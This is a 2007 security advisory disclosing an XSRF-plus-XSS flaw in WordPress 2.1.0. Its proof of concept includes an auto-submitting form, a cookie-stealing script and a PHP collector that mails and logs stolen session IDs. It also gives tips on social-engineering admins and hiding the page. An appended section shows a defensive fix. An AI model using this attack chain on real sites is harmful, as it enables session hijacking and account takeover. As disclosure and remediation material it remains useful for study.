Advisory4-20022007.txt

Reported: 06 Mar 2007 by ciri. Type: packetstorm. Source: packetstormsecurity.com

Wordpress v2.1.0 XSRF and XSS vulnerability

---------------------------------------------------------------------------------
| ____ ____.__ __ |  
| \ \ / /|__|_______/ |_ __ _______ ___ ___ |  
| \ Y / | \_ __ \ __\ | \__ \ \ \/ / |  
| \ / | || | \/| | | | // __ \_> < |  
| \___/ |__||__| |__| |____/(____ /__/\_ \ |  
| \/ \/ |  
| Security without illusions |  
| www.virtuax.be |  
| |  
---------------------------------------------------------------------------------  
  
  
Application: Wordpress  
Vulnerable Versions: <= v2.1.0  
Vulnerability: XSRF with XSS  
  
Vendor: http://www.wordpress.net  
Vendor Status: Notified  
  
Found: 20-02-2007  
Public Release Date: 01-03-2007  
Last modified: 01-03-2007  
Author: ciri  
E-mail: ciri[a.t]virtuax[d.o.t]be  
  
reference: http://www.virtuax.be/advisories/Advisory4-20022007.txt  
  
=================================================================================  
  
Shouts to the VirtuaX Crew & Community!  
Special thanks go out to R4N01 for noticing the XSS!  
  
=================================================================================  
  
  
  
I. Background  
-------------  
  
"WordPress is a state-of-the-art semantic personal publishing platform with a   
focus on aesthetics, web standards, and usability. "  
by wordpress.net  
  
II. Vulnerability
----------------
  
If you are logged in to WordPress as an admin, your comments are not properly
sanitized, so an XSS payload can be posted. Normally an admin would not submit an
XSS input vector, but a simple XSRF page can make the admin's browser do it.
  
IIa. Affected Versions  
----------------------  
  
I'm assuming all versions <= 2.1.0 are vulnerable although I have only tested the
latest version (2.1.0). This should work in all browsers that have JavaScript enabled
(default in most browsers).
  
III. PoC  
--------  
  
[code=sploit.html]  
<form action="http://example.com/wp-comments-post.php" method="post" name="commentform" id="commentform">  
<textarea name="comment" id="comment">  
<script>String.fromCharCode(x,y,z,q,r,s)+document.cookie;</script>
</textarea>  
  
<input type="hidden" name="comment_post_ID" value="**ID**" />  
</form>  
<script>document.commentform.submit();</script>  
[/code]  
  
[code=steal.php]  
<?php  
//Get the session id  
$id = $_GET["id"];  
  
//Send it to our e-mail  
mail("[email protected]", "Cookie stolen", $id);  
  
//Save a backup  
$file = fopen('log.txt', 'a');  
fwrite($file, $id . "\n\n");  
?>  
[/code]  
  
Notes:
- **ID** should be the ID of the comment page in which you want to inject
the XSS.
- Replace 'String.fromCharCode(x,y,z,q,r,s)' with the appropriate integers
which lead to steal.php (you can look them up in an ASCII table),
e.g. http://yoursite.com/steel.php?id=
String.fromCharCode(104,116,116,112,58,47,47,121,111,117,114,
115,105,116,101,46,99,111,109,47,115,116,101,101,108,46,112,
104,112,63,105,100,61);
We need to do this because WordPress escapes quotes.
  
We trick the admin into going to our sploit.html page (should be fairly easy
using basic social engineering skills). It is recommended that you hide the page
in a frame with no height; more stealth options are beyond the scope of this
advisory. Upon entering the page, the admin will post the XSS input vector as a
comment. Hereafter he and EVERY other user that visits the page with comments will
automatically submit their session IDs to you.
  
Copyright 2007 by ciri from Virtuax.be. All rights reserved.
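The two defects the advisory chains together are (1) the comment endpoint accepting a POST that any third-party page can forge, and (2) the comment body being trusted because the poster is an admin. The following is an added example of how a comment-post handler closes both gaps; it is not WordPress code and not part of the advisory. It assumes a server-side secret in `SITE_SECRET`, a session ID available to the handler, and a hidden field named `csrf_token` in the comment form; all three names are this example's own choices.

```php
<?php
// Added defensive example, not WordPress code. Shows an anti-CSRF token bound
// to the session and the target post, plus role-independent escaping of the
// comment body, which neutralises the stored XSS the advisory relies on.
declare(strict_types=1);

// Placeholder for a long random secret loaded from configuration (assumption).
const SITE_SECRET = 'replace-with-a-long-random-secret';

// Token derived from the session and the post ID. A form built on an
// attacker's page has no way to compute it, so the forged POST in the
// advisory (which carries no token) is rejected.
function comment_token(string $session_id, int $post_id): string {
    return hash_hmac('sha256', "comment-post:$post_id:$session_id", SITE_SECRET);
}

function verify_comment_token(?string $given, string $session_id, int $post_id): bool {
    if ($given === null) {
        return false;
    }
    // Constant-time comparison avoids leaking the token byte by byte.
    return hash_equals(comment_token($session_id, $post_id), $given);
}

// Escape the comment for everyone, admin included. The advisory's point is
// that "trusted" admin input reaches the page unsanitised; removing the
// role-based exemption is the fix.
function sanitize_comment(string $comment): string {
    return htmlspecialchars($comment, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Legitimate form: the token travels as a hidden field alongside the post ID.
function render_comment_form(string $session_id, int $post_id): string {
    $token = comment_token($session_id, $post_id);
    return '<form action="/wp-comments-post.php" method="post">'
        . '<textarea name="comment"></textarea>'
        . '<input type="hidden" name="comment_post_ID" value="' . $post_id . '">'
        . '<input type="hidden" name="csrf_token" value="' . $token . '">'
        . '<input type="submit" value="Post"></form>';
}

// POST handler: returns the escaped comment to store, or null when rejected.
function handle_comment_post(array $post, string $session_id): ?string {
    $post_id = (int)($post['comment_post_ID'] ?? 0);
    if (!verify_comment_token($post['csrf_token'] ?? null, $session_id, $post_id)) {
        http_response_code(403);
        return null;
    }
    return sanitize_comment((string)($post['comment'] ?? ''));
}

// The payload reads document.cookie; an HttpOnly session cookie is not
// readable from script, which limits what a surviving XSS can exfiltrate.
session_set_cookie_params(['httponly' => true, 'secure' => true, 'samesite' => 'Lax']);

// Demonstration with constructed input (not captured traffic).
$sid = 'demo-session';
// The advisory's cross-site POST: comment and post ID, but no token.
$forged = ['comment' => '<script>alert(1)</script>', 'comment_post_ID' => '7'];
var_dump(handle_comment_post($forged, $sid));
// The same body submitted through the real form carries a valid token and is
// stored escaped, so the script tag is rendered as text.
$legit = $forged + ['csrf_token' => comment_token($sid, 7)];
echo handle_comment_post($legit, $sid), "\n";
```

Binding the token to the post ID means a token harvested from one comment form cannot be replayed against another post; binding it to the session means it expires with the login. Escaping unconditionally rather than per role is the part most relevant to this advisory, since the forged request is, from the server's point of view, a perfectly ordinary admin comment.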
